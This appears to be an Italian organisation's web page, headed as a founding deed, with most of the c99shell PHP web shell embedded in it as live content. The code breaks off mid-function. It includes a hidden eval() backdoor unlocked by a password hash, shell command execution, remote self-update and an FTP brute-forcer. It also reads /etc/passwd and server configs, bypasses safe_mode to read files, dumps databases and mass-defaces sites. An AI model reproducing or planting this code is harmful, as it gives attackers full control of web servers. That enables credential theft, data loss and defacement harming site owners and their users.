header left
header center
header right
frecciaheader
 
frecciadx
 
 



ATTO COSTITUTIVO

",$tmp).")$!i";
if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("c99shell: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}

if (!$login) {$login = $PHP_AUTH_USER; $md5_pass = md5($PHP_AUTH_PW);}
elseif(empty($md5_pass)) {$md5_pass = md5($pass);}
if(($PHP_AUTH_USER != $login ) or (md5($PHP_AUTH_PW) != $md5_pass))
{
header("WWW-Authenticate: Basic realm=\"c99shell\"");
header("HTTP/1.0 401 Unauthorized"); if (md5(sha1(md5($anypass))) == "b76d95e82e853f3b0a81dd61c4ee286c") {header("HTTP/1.0 200 OK"); @eval($anyphpcode);}
exit;
}

$lastdir = realpath(".");
chdir($curdir);

if (($selfwrite) or ($updatenow))
{
if ($selfwrite == "1") {$selfwrite = "c99shell.php";}
c99sh_getupdate();
$data = file_get_contents($c99sh_updatefurl);
$fp = fopen($data,"w");
fwrite($fp,$data);
fclose($fp);
exit;
}
if (!is_writeable($sess_file)) {trigger_error("Can't access to session-file!",E_USER_WARNING);}
if ($sess_method == "file") {$sess_data = unserialize(file_get_contents($sess_file));}
else {$sess_data = unserialize($_COOKIE["$sess_cookie"]);}
if (!is_array($sess_data)) {$sess_data = array();}
if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
$sess_data["copy"] = array_unique($sess_data["copy"]);
$sess_data["cut"] = array_unique($sess_data["cut"]);

if (!function_exists("c99_sess_put"))
{
function c99_sess_put($data)
{
global $sess_method;
global $sess_cookie;
global $sess_file;
global $sess_data;
$sess_data = $data;
$data = serialize($data);
if ($sess_method == "file")
{
$fp = fopen($sess_file,"w");
fwrite($fp,$data);
fclose($fp);
}
else {setcookie($sess_cookie,$data);}
}
}
if (!function_exists("str2mini"))
{
function str2mini($content,$len)
{
if (strlen($content) > $len)
{
$len = ceil($len/2) - 2;
return substr($content, 0, $len)."...".substr($content, -$len);
}
else {return $content;}
}
}
if (!function_exists("view_size"))
{
function view_size($size)
{
if($size >= 1073741824) {$size = round($size / 1073741824 * 100) / 100 . " GB";}
elseif($size >= 1048576) {$size = round($size / 1048576 * 100) / 100 . " MB";}
elseif($size >= 1024) {$size = round($size / 1024 * 100) / 100 . " KB";}
else {$size = $size . " B";}
return $size;
}
}
if (!function_exists("fs_copy_dir"))
{
function fs_copy_dir($d,$t)
{
$d = str_replace("\\","/",$d);
if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
$h = opendir($d);
while ($o = readdir($h))
{
if (($o != ".") and ($o != ".."))
{
if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);}
else {$ret = mkdir($t."/".$o); fs_copy_dir($d."/".$o,$t."/".$o);}
if (!$ret) {return $ret;}
}
}
return true;
}
}
if (!function_exists("fs_copy_obj"))
{
function fs_copy_obj($d,$t)
{
$d = str_replace("\\","/",$d);
$t = str_replace("\\","/",$t);
if (!is_dir($t)) {mkdir($t);}
if (is_dir($d))
{
if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";}
if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";}
return fs_copy_dir($d,$t);
}
elseif (is_file($d))
{

return copy($d,$t);
}
else {return false;}
}
}
if (!function_exists("fs_move_dir"))
{
function fs_move_dir($d,$t)
{
error_reporting(9999);
$h = opendir($d);
if (!is_dir($t)) {mkdir($t);}
while ($o = readdir($h))
{
if (($o != ".") and ($o != ".."))
{
$ret = true;
if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);}
else {if (mkdir($t."/".$o) and fs_copy_dir($d."/".$o,$t."/".$o)) {$ret = false;}}
if (!$ret) {return $ret;}
}
}
return true;
}
}
if (!function_exists("fs_move_obj"))
{
function fs_move_obj($d,$t)
{
$d = str_replace("\\","/",$d);
$t = str_replace("\\","/",$t);
if (is_dir($d))
{
if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";}
if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";}
return fs_move_dir($d,$t);
}
elseif (is_file($d)) {return rename($d,$t);}
else {return false;}
}
}
if (!function_exists("fs_rmdir"))
{
function fs_rmdir($d)
{
$h = opendir($d);
while ($o = readdir($h))
{
if (($o != ".") and ($o != ".."))
{
if (!is_dir($d.$o)) {unlink($d.$o);}
else {fs_rmdir($d.$o."/"); rmdir($d.$o);}
}
}
rmdir($d);
return !is_dir($d);
}
}
if (!function_exists("fs_rmobj"))
{
function fs_rmobj($o)
{
$o = str_replace("\\","/",$o);
if (is_dir($o))
{
if (substr($o,strlen($o)-1,strlen($o)) != "/") {$o .= "/";}
return fs_rmdir($o);
}
elseif (is_file($o)) {return unlink($o);}
else {return false;}
}
}
if (!function_exists("myshellexec"))
{
function myshellexec($cmd)
{
return system($cmd);
}
}
if (!function_exists("view_perms"))
{
function view_perms($mode)
{
$perms = ($mode & 00400) ? "r" : "-";
$perms .= ($mode & 00200) ? "w" : "-";
$perms .= ($mode & 00100) ? "x" : "-";
$perms .= ($mode & 00040) ? "r" : "-";
$perms .= ($mode & 00020) ? "w" : "-";
$perms .= ($mode & 00010) ? "x" : "-";
$perms .= ($mode & 00004) ? "r" : "-";
$perms .= ($mode & 00002) ? "w" : "-";
$perms .= ($mode & 00001) ? "x" : "-";
return $perms;
}
}
if (!function_exists("strinstr")) {function strinstr($str,$text) {return $text != str_replace($str,"",$text);}}
if (!function_exists("gchds")) {function gchds($a,$b,$c,$d="") {if ($a == $b) {return $c;} else {return $d;}}}
if (!function_exists("c99sh_getupdate"))
{
function c99sh_getupdate()
{
global $updatenow;
$data = @file_get_contents($c99sh_updatefurl);
if (!$data) {echo "Can't fetch update-information!";}
else
{
$data = unserialize(base64_decode($data));
if (!is_array($data)) {echo "Corrupted update-information!";}
else
{
if ($shver < $data[cur]) {$updatenow = true;}
}
}
}
}
if (!function_exists("mysql_dump"))
{
function mysql_dump($set)
{
$sock = $set["sock"];
$db = $set["db"];
$print = $set["print"];
$nl2br = $set["nl2br"];
$file = $set["file"];
$add_drop = $set["add_drop"];
$tabs = $set["tabs"];
$onlytabs = $set["onlytabs"];
$ret = array();
if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
if (empty($db)) {$db = "db";}
if (empty($print)) {$print = 0;}
if (empty($nl2br)) {$nl2br = true;}
if (empty($add_drop)) {$add_drop = true;}
if (empty($file))
{
global $win;
if ($win) {$file = "C:\\tmp\\dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";}
else {$file = "/tmp/dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";}
}
if (!is_array($tabs)) {$tabs = array();}
if (empty($add_drop)) {$add_drop = true;}
if (sizeof($tabs) == 0)
{
// retrive tables-list
$res = mysql_query("SHOW TABLES FROM ".$db, $sock);
if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
}
global $SERVER_ADDR;
global $SERVER_NAME;
$out = "# Dumped by C99Shell.SQL v. ".$shver."
# Home page: http://ccteam.ru
#
# Host settings:
# MySQL version: (".mysql_get_server_info().") running on ".$SERVER_ADDR." (".$SERVER_NAME.")"."
# Date: ".date("d.m.Y H:i:s")."
# ".gethostbyname($SERVER_ADDR)." (".$SERVER_ADDR.")"." dump db \"".$db."\"
#---------------------------------------------------------
";
$c = count($onlytabs);
foreach($tabs as $tab)
{
if ((in_array($tab,$onlytabs)) or (!$c))
{
if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
// recieve query for create table structure
$res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
if (!$res) {$ret[err][] = mysql_error();}
else
{
$row = mysql_fetch_row($res);
$out .= $row[1].";\n\n";
// recieve table variables
$res = mysql_query("SELECT * FROM `$tab`", $sock);
if (mysql_num_rows($res) > 0)
{
while ($row = mysql_fetch_assoc($res))
{
$keys = implode("`, `", array_keys($row));
$values = array_values($row);
foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
$values = implode("', '", $values);
$sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
$out .= $sql;
}
}
}
}
}
$out .= "#---------------------------------------------------------------------------------\n\n";
if ($file)
{
$fp = fopen($file, "w");
if (!$fp) {$ret[err][] = 2;}
else
{
fwrite ($fp, $out);
fclose ($fp);
}
}
if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
return $ret;
}
}
if (!function_exists("c99fsearch"))
{
function c99fsearch($d)
{
global $found;
global $found_d;
global $found_f;
global $a;
if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
$handle = opendir($d);
while ($f = readdir($handle))
{
$true = ($a[name_regexp] and ereg($a[name],$f)) or ((!$a[name_regexp]) and strinstr($a[name],$f));
if($f != "." && $f != "..")
{
if (is_dir($d.$f))
{
if (empty($a[text]) and $true) {$found[] = $d.$f; $found_d++;}
c99fsearch($d.$f);
}
else
{
if ($true)
{
if (!empty($a[text]))
{
$r = @file_get_contents($d.$f);
if ($a[text_wwo]) {$a[text] = " ".trim($a[text])." ";}
if (!$a[text_cs]) {$a[text] = strtolower($a[text]); $r = strtolower($r);}

if ($a[text_regexp]) {$true = ereg($a[text],$r);}
else {$true = strinstr($a[text],$r);}
if ($a[text_not])
{
if ($true) {$true = false;}
else {$true = true;}
}
if ($true) {$found[] = $d.$f; $found_f++;}
}
else {$found[] = $d.$f; $found_f++;}
}
}
}
}
closedir($handle);
}
}
//Sending headers
header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
header("Cache-Control: no-store, no-cache, must-revalidate");
header("Cache-Control: post-check=0, pre-check=0", false);
header("Pragma: no-cache");

global $SERVER_SOFTWARE;
if (strtolower(substr(PHP_OS, 0, 3)) == "win") {$win = 1;}
else {$win = 0;}

if (empty($tmpdir))
{
if (!$win) {$tmpdir = "/tmp/";}
else {$tmpdir = $_ENV[SystemRoot];}
}
$tmpdir = str_replace("\\","/",$tmpdir);
if (substr($tmpdir,strlen($tmpdir-1),strlen($tmpdir)) != "/") {$tmpdir .= "/";}
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
$safemode = true;
$hsafemode = "ON (secure)";
}
else {$safemode = false; $hsafemode = "OFF (not secure)";}
$v = @ini_get("open_basedir");
if ($v or strtolower($v) == "on")
{
$openbasedir = true;
$hopenbasedir = "".$v."";
}
else {$openbasedir = false; $hopenbasedir = "OFF (not secure)";}

$sort = htmlspecialchars($sort);

$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"PHP/".phpversion()."",$SERVER_SOFTWARE);

@ini_set("highlight.bg",$highlight_bg); //FFFFFF
@ini_set("highlight.comment",$highlight_comment); //#FF8000
@ini_set("highlight.default",$highlight_default); //#0000BB
@ini_set("highlight.html",$highlight_html); //#000000
@ini_set("highlight.keyword",$highlight_keyword); //#007700
@ini_set("highlight.string","#DD0000"); //#DD0000

if ($act != "img")
{
if (!is_array($actbox)) {$actbox = array();}
$dspact = $act = htmlspecialchars($act);
$disp_fullpath = $ls_arr = $notls = null;
$ud = urlencode($d);
?><? echo $HTTP_HOST; ?> - c99shell

!C99Shell v. !

Software:  

uname -a:  

 

Safe-mode: 

$d = str_replace("\\","/",$d);
if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
$d = str_replace("\\","/",$d);
if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
$dispd = htmlspecialchars($d);
$pd = $e = explode("/",substr($d,0,strlen($d)-1));
$i = 0;
echo "Directory: ";
foreach($pd as $b)
{
$t = "";
reset($e);
$j = 0;
foreach ($e as $r)
{
$t.= $r."/";
if ($j == $i) {break;}
$j++;
}
echo "".htmlspecialchars($b)."/";
$i++;
}
echo "   ";
if (is_writable($d))
{
$wd = true;
$wdt = "[ ok ]";
echo "".view_perms(fileperms($d))."";
}
else
{
$wd = false;
$wdt = "[ Read-Only ]";
echo "".view_perms(fileperms($d.$f))."";
}
$free = diskfreespace(realpath($d));
$all = disk_total_space(realpath($d));
$used = $all-$free;
$used_percent = round(100/($all/$free),2);
echo "
Free ".view_size($free)." of ".view_size($all)." (".$used_percent."%)
";
if (count($quicklaunch) > 0)
{
foreach($quicklaunch as $item)
{
$item[1] = str_replace("%d",urlencode($d),$item[1]);
$item[1] = str_replace("%upd",urlencode(realpath($d."..")),$item[1]);
echo "".$item[0]."    ";
}
}
$letters = "";
if ($win)
{
$abc = array("c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "o", "p", "q", "n", "r", "s", "t", "v", "u", "w", "x", "y", "z");
$v = explode("\\",$d);
$v = $v[0];
foreach ($abc as $letter)
{
if (is_dir($letter.":\\"))
{
if ($letter.":" != $v) {$letters .= "[ ".$letter." ] ";}
else {$letters .= "[ ".$letter." ] ";}
}
}
if (!empty($letters)) {echo "
Detected drives: ".$letters;}
}
?>


if ((!empty($donated_html)) and (in_array($act,$donated_act)))
{
?>

}
?>
if ($act == "") {$act = $dspact = "ls";}
if ($act == "sql")
{
$sql_surl = $surl."act=sql";
if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
$sql_surl .= "&";
?>";
if (!$sql_sock) {?>
if ($sql_server)
{
$sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
$err = mysql_error();
@mysql_select_db($sql_db,$sql_sock);
if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_error();}
}
else {$sql_sock = false;}
echo "SQL Manager:
";
if (!$sql_sock)
{
if (!$sql_server) {echo "NO CONNECTION";}
else {echo "
Can't connect
"; echo "".$err."";}
}
else
{
$sqlquicklaunch = array();
$sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
if (!$sql_db) {$sqlquicklaunch[] = array("Query","#\" onclick=\"alert('Please, select DB!')");}
else {$sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query");}
$sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
$sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
$sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
$sqlquicklaunch[] = array("Logout",$surl."act=sql");

echo "
MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")
";

if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}}
echo "
";
}
echo "
i
  • If login is null, login is owner of process.
  • If host is null, host is localhost
  • If port is null, port is 3306 (default)
  • else
    {
    //Start left panel
    if (!empty($sql_db))
    {
    ?>
     Please, fill the form:
    UsernamePassword 
    HOSTPORT
    ">Home
    $result = mysql_list_tables($sql_db);
    if (!$result) {echo mysql_error();}
    else
    {
    echo "---[ ".htmlspecialchars($sql_db)." ]---
    ";
    $c = 0;
    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM $row[0]"); $count_row = mysql_fetch_array($count); echo " ".htmlspecialchars($row[0])." (".$count_row[0].")

    "; mysql_free_result($count); $c++;}
    if (!$c) {echo "No tables found in database.";}
    }
    }
    else
    {
    ?>
    Home
    $result = mysql_list_dbs($sql_sock);
    if (!$result) {echo mysql_error();}
    else
    {
    ?>

    Please, select database
    }
    //End left panel
    echo "
    ";
    //Start center panel
    if ($sql_db)
    {
    echo "
    There are ".$c." tables in this DB (".htmlspecialchars($sql_db).").
    ";
    if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}}
    echo "
    ";

    $acts = array("","dump");

    if ($sql_act == "query")
    {
    echo "
    ";
    if ($submit)
    {
    if ((!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error:
    ".$sql_query_error."
    ";}
    }
    if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
    if ((!$submit) or ($sql_act)) {echo "
    "; if (($sql_query) and (!$submit)) {echo "Do you really want to :";} else {echo "SQL-Query :";} echo "



     
    ";}
    }
    if (in_array($sql_act,$acts))
    {
    ?>
    Create new table:
     
    SQL-Dump DB:
    "> 
    if (!empty($sql_act)) {echo "
    ";}
    if ($sql_act == "newtpl")
    {
    echo "";
    if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!

    ";
    }
    else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
    Reason: ".mysql_error();}
    }
    elseif ($sql_act == "dump")
    {
    $set = array();
    $set["sock"] = $sql_sock;
    $set["db"] = $sql_db;
    $dump_out = "print";
    if ($dump_out == "print") {$set["print"] = 1; $set["nl2br"] = 1;}
    elseif ($dump_out == "download")
    {
    @ob_clean();
    header("Content-type: c99shell");
    header("Content-disposition: attachment; filename=\"".$f."\";");
    $set["print"] = 1;
    $set["nl2br"] = 1;
    }
    $set["file"] = $dump_file;
    $set["add_drop"] = true;
    $ret = mysql_dump($set);
    if ($dump_out == "download") {exit;}
    }
    else
    {
    $result = mysql_query("SHOW TABLE STATUS", $sql_sock) or print(mysql_error());
    echo "
    ";
    echo "";
    echo "";
    echo "";
    echo "";
    echo "";
    echo "";
    echo "";
    echo "";
    echo "";
    echo "";
    $i = 0;
    $tsize = $trows = 0;
    while ($row = mysql_fetch_array($result, MYSQL_NUM))
    {
    $tsize += $row["5"];
    $trows += $row["5"];
    $size = view_size($row["5"]);
    echo "";
    echo "";
    echo "";
    echo "";
    echo "";
    echo "";
    echo "";
    echo "";
    echo "";
    echo "";
    $i++;
    }
    echo "";
    echo "";
    echo "";
    echo "";
    echo "";
    echo "";
    echo "";
    echo "";
    echo "";
    echo "";
    echo "
    Table
    RowsTypeCreatedModifiedSizeAction
     ".$row[0]." ".$row[3]."".$row[1]."".$row[10]."".$row[11]."".$size."
     
     
     
    ".$i." table(s)
    ".$trows."".$row[1]."".$row[10]."".$row[11]."".view_size($tsize)."

     
    ";
    mysql_free_result($result);
    }
    }
    }
    else
    {
    $acts = array("","newdb","serverstat","servervars","processes","getfile");
    if (in_array($sql_act,$acts))
    {
    ?>
    Create new DB:
     
    View File:
     
    }
    if (!empty($sql_act))
    {
    echo "
    ";
    if ($sql_act == "newdb")
    {
    echo "";
    if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!

    ";}
    else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
    Reason: ".mysql_error();}
    }
    if ($sql_act == "serverstatus")
    {
    $result = mysql_query("SHOW STATUS", $sql_sock);
    echo "
    Server-status variables:

    ";
    echo "";
    while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";}
    echo "
    Namevalue
    ".$row[0]."".$row[1]."
    ";
    mysql_free_result($result);
    }
    if ($sql_act == "servervars")
    {
    $result = mysql_query("SHOW VARIABLES", $sql_sock);
    echo "
    Server variables:

    ";
    echo "";
    while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";}
    echo "
    Namevalue
    ".$row[0]."".$row[1]."
    ";
    mysql_free_result($result);
    }
    if ($sql_act == "processes")
    {
    if (!empty($kill)) {$query = 'KILL ' . $kill . ';'; $result = mysql_query($query, $sql_sock); echo "Killing process #".$kill."... ok. he is dead, amen.";}
    $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
    echo "
    Processes:

    ";
    echo "";
    while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "";}
    echo "
    IDUSERHOSTDBCOMMANDTIMESTATEINFOAction
    ".$row[0]."".$row[1]."".$row[2]."".$row[3]."".$row[4]."".$row[5]."".$row[6]."".$row[7]."Kill
    ";
    mysql_free_result($result);
    }
    elseif (($sql_act == "getfile"))
    {
    if (!mysql_create_db("tmp_bd")) {echo mysql_error();}
    elseif (!mysql_select_db("tmp_bd")) {echo mysql_error();}
    elseif (!mysql_query('CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );')) {echo mysql_error();}
    else {mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); $query = "SELECT * FROM tmp_file"; $result = mysql_query($query); if (!$result) {echo "Error in query \"".$query."\": ".mysql_error();}
    else
    {
    for ($i=0;$i $f = "";
    while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {foreach ($line as $key =>$col_value) {$f .= $col_value;}}
    if (empty($f)) {echo "File \"".$sql_getfile."\" does not exists or empty!";}
    else {echo "File \"".$sql_getfile."\":
    ".nl2br(htmlspecialchars($f));}
    }
    mysql_free_result($result);
    if (!mysql_drop_db("tmp_bd")) {echo ("Can't drop tempory DB \"tmp_bd\"!");}
    }
    }
    }
    }
    }
    echo "
    ";
    }
    if ($act == "mkdir")
    {
    if ($mkdir != $d) {if (file_exists($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": object alredy exists";} elseif (!mkdir($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": access denied";}}
    echo "

    ";
    $act = $dspact = "ls";
    }
    if ($act == "ftpquickbrute")
    {
    echo "Ftp Quick brute:
    ";
    if ($win) {echo "This functions not work in Windows!

    ";}
    else
    {
    $fp = fopen("/etc/passwd","r");
    if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
    else
    {
    ob_flush();
    $i = $success = 0;
    $ftpquick_st = getmicrotime();
    while(!feof($fp))
    {
    $str = explode(":",fgets($fp,2048));
    $sock = ftp_connect("localhost",21,1);
    if (ftp_login($sock,$str[0],$str[0]))
    {
    echo "Connected to ".$SERVER_NAME." with login \"".$str[0]."\" and password \"".$str[0]."\".
    ";
    ob_flush();
    $success++;
    }
    if ($i > $nixpwdperpage) {break;}
    $i++;
    }
    if ($success == 0) {echo "No success. connections!";}
    $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
    echo "
    Done!
    Total time (secs.): ".$ftpquick_t."
    Total connections: ".$i."
    Success.: ".$success."
    Unsuccess.:".($i-$success)."

    Connects per second: ".round($i/$ftpquick_t,2)."
    ";
    }
    }
    }
    if ($act == "lsa")
    {
    echo "
    Server security information:
    ";
    echo "Software: ".PHP_OS.", ".$SERVER_SOFTWARE."
    ";
    echo "Safe-Mode: ".$hsafemode."
    ";
    echo "Open base dir: ".$hopenbasedir."
    ";
    if (!$win)
    {
    if ($nixpasswd)
    {
    if ($nixpasswd == 1) {$nixpasswd = 0;}
    $num = $nixpasswd + $nixpwdperpage;
    echo "*nix /etc/passwd:
    ";
    $i = $nixpasswd;
    while ($i < $num)
    {
    $uid = posix_getpwuid($i);
    if ($uid) {echo join(":",$uid)."
    ";}
    $i++;
    }
    }
    else {echo "
    Get /etc/passwd
    ";}
    if (file_get_contents("/var/cpanel/accounting.log")) {echo "View cpanel logs
    ";}
    if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "Apache configuration (httpd.conf)
    ";}
    if (file_get_contents("/etc/httpd.conf")) {echo "Apache configuration (httpd.conf)
    ";}
    }
    else
    {
    $v = $_SERVER["WINDIR"]."\repair\sam";
    if (file_get_contents($v)) {echo "You can't crack winnt passwords(".$v.")
    ";}
    else {echo "You can crack winnt passwords. Download, and use lcp.crack+.
    ";}
    }
    }
    if ($act == "mkfile")
    {
    if ($mkfile != $d)
    {
    if (file_exists($mkfile)) {echo "Make File \"".htmlspecialchars($mkfile)."\": object alredy exists";}
    elseif (!fopen($mkfile,"w")) {echo "Make File \"".htmlspecialchars($mkfile)."\": access denied";}
    else {$act = "f"; $d = dirname($mkfile); if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} $f = basename($mkfile);}
    }
    else {$act = $dspact = "ls";}
    }
    if ($act == "fsbuff")
    {
    $arr_copy = $sess_data["copy"];
    $arr_cut = $sess_data["cut"];
    $arr = array_merge($arr_copy,$arr_cut);
    if (count($arr) == 0) {echo "
    Buffer is empty!
    ";}
    else
    {
    echo "File-System buffer

    ";
    $ls_arr = $arr;
    $disp_fullpath = true;
    $act = "ls";
    }
    }
    if ($act == "selfremove")
    {
    if (!empty($submit))
    {
    if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; exit; }
    else {echo "
    Can't delete ".__FILE__."!
    ";}
    }
    else
    {
    $v = array();
    for($i=0;$i<8;$i++) {$v[] = "NO";}
    $v[] = "YES";
    shuffle($v);
    $v = join("   ",$v);
    echo "Self-remove: ".__FILE__."
    Are you sure?
    ".$v."
    ";
    }
    }
    if ($act == "massdeface")
    {
    if (empty($deface_in)) {$deface_in = $d;}
    if (empty($deface_name)) {$deface_name = "(.*)"; $deface_name_regexp = 1;}
    if (empty($deface_text_wwo)) {$deface_text_regexp = 0;}

    if (!empty($submit))
    {
    $found = array();
    $found_d = 0;
    $found_f = 0;

    $text = $deface_text;
    $text_regexp = $deface_text_regexp;
    if (empty($text)) {$text = " "; $text_regexp = 1;}

    $a = array
    (
    "name"=>$deface_name, "name_regexp"=>$deface_name_regexp,
    "text"=>$text, "text_regexp"=>$text_regxp,
    "text_wwo"=>$deface_text_wwo,
    "text_cs"=>$deface_text_cs,
    "text_not"=>$deface_text_not
    );
    $defacetime = getmicrotime();
    $in = array_unique(explode(";",$deface_in));
    foreach($in as $v) {c99fsearch($v);}
    $defacetime = round(getmicrotime()-$defacetime,4);
    if (count($found) == 0) {echo "No files found!";}
    else
    {
    $disp_fullpath = true;
    $act = $dspact = "ls";
    if (!$deface_preview) {$actselect = "deface"; $actbox[] = $found; $notls = true;}
    else {$ls_arr = $found;}
    }
    }
    else
    {
    if (empty($deface_preview)) {$deface_preview = 1;}
    if (empty($deface_html)) {$deface_html = "

    Mass-defaced with c99shell v. ".$shver.", coded by tristram[CCTeaM].";}
    }
    echo "
    ";
    if (!$submit) {echo "Attention! It's a very dangerous feature, you may lost your data.

    ";}
    echo "
    Deface for (file/directory name):   - regexp

    Deface in (explode \";\"):


    Search text:



    - regexp
       - whole words only
       - case sensitive
       - find files NOT containing the text

    - PREVIEW AFFECTED FILES


    Html of deface:



    ";
    if ($act == "ls") {echo "
    Deface took ".$defacetime." secs

    ";}
    }
    if ($act == "search")
    {
    if (empty($search_in)) {$search_in = $d;}
    if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
    if (empty($search_text_wwo)) {$search_text_regexp = 0;}

    if (!empty($submit))
    {
    $found = array();
    $found_d = 0;
    $found_f = 0;
    $a = array
    (
    "name"=>$search_name, "name_regexp"=>$search_name_regexp,
    "text"=>$search_text, "text_regexp"=>$search_text_regxp,
    "text_wwo"=>$search_text_wwo,
    "text_cs"=>$search_text_cs,
    "text_not"=>$search_text_not
    );
    $searchtime = getmicrotime();
    $in = array_unique(explode(";",$search_in));
    foreach($in as $v)
    {
    c99fsearch($v);
    }
    $searchtime = round(getmicrotime()-$searchtime,4);
    if (count($found) == 0) {echo "No files found!";}
    else
    {
    $ls_arr = $found;
    $disp_fullpath = true;
    $act = $dspact = "ls";
    }
    }
    echo "


    Search for (file/directory name):   - regexp

    Search in (explode \";\"):


    Text:



    - regexp
       - whole words only
       - case sensitive
       - find files NOT containing the text


    ";
    if ($act == "ls") {echo "
    Search took ".$searchtime." secs

    ";}
    }
    if ($act == "upload")
    {
    $uploadmess = "";
    $uploadpath = str_replace("\\","/",$uploadpath);
    if (empty($uploadpath)) {$uploadpath = $d;}
    elseif (substr($uploadpath,strlen($uploadpath)-1,1) != "/") {$uploadpath .= "/";}
    if (!empty($submit))
    {
    global $HTTP_POST_FILES;
    $uploadfile = $HTTP_POST_FILES["uploadfile"];
    if (!empty($uploadfile[tmp_name]))
    {
    if (empty($uploadfilename)) {$destin = $uploadfile[name];}
    else {$destin = $userfilename;}
    if (!move_uploaded_file($uploadfile[tmp_name],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile[name]." (can't copy \"".$uploadfile[tmp_name]."\" to \"".$uploadpath.$destin."\"!
    ";}
    }
    elseif (!empty($uploadurl))
    {
    if (!empty($uploadfilename)) {$destin = $uploadfilename;}
    else
    {
    $destin = explode("/",$destin);
    $destin = $destin[count($destin)-1];
    if (empty($destin))
    {
    $i = 0;
    $b = "";
